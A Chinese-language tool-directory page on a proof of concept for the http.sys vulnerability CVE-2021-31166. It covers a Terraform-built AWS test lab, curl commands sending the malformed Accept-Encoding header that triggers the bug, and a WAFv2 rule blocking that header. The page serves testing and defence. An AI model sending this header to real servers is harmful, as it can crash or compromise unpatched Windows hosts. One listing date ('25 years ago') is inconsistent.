Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WIn-CVE-2021-31166 — CVE-2021-31166 (http.sys RCE) 的概念验证,包括在 AWS 上使用 Terraform 部署,以及测试脚本和阻止该漏洞利用的 WAFv2 规则。 | Kitploit
工具/GitHubGitHub/bgsilvait/win-cve-2021-31166
漏洞分析漏洞利用IDS/IPS规避Web安全云安全DevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

CVE-2021-31166 (http.sys RCE) 的概念验证,包括在 AWS 上使用 Terraform 部署,以及测试脚本和阻止该漏洞利用的 WAFv2 规则。

查看仓库
25年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WIn-CVE-2021-31166

本仓库 受 0vercl0k 启发,是 CVE-2021-31166(“HTTP协议栈远程代码执行漏洞”)的概念验证,该漏洞是微软在2021年5月修补的 http.sys 中的一个释放后使用(use-after-free)问题。

构建基础设施

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Terraform 将创建一个运行 Windows Server Core 20H2 的 EC2 实例,安装 IIS 并添加 SSM 权限以从 AWS 控制台打开 Web Powershell 会话。它还会创建一个应用程序负载均衡器并将该实例作为目标。默认情况下,安全组将仅添加 您的 IP 以允许通过 HTTP 访问。

获取值

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

测试连接性

root@kitploit:~
#测试到ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#测试直接到EC2
while true; do curl -I $EC2IP --connect-timeout 1 ; done

注入CVE头部

root@kitploit:~
#测试到ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#测试直接到EC2
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

AWS WAFv2 用于拦截的规则

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
下载工具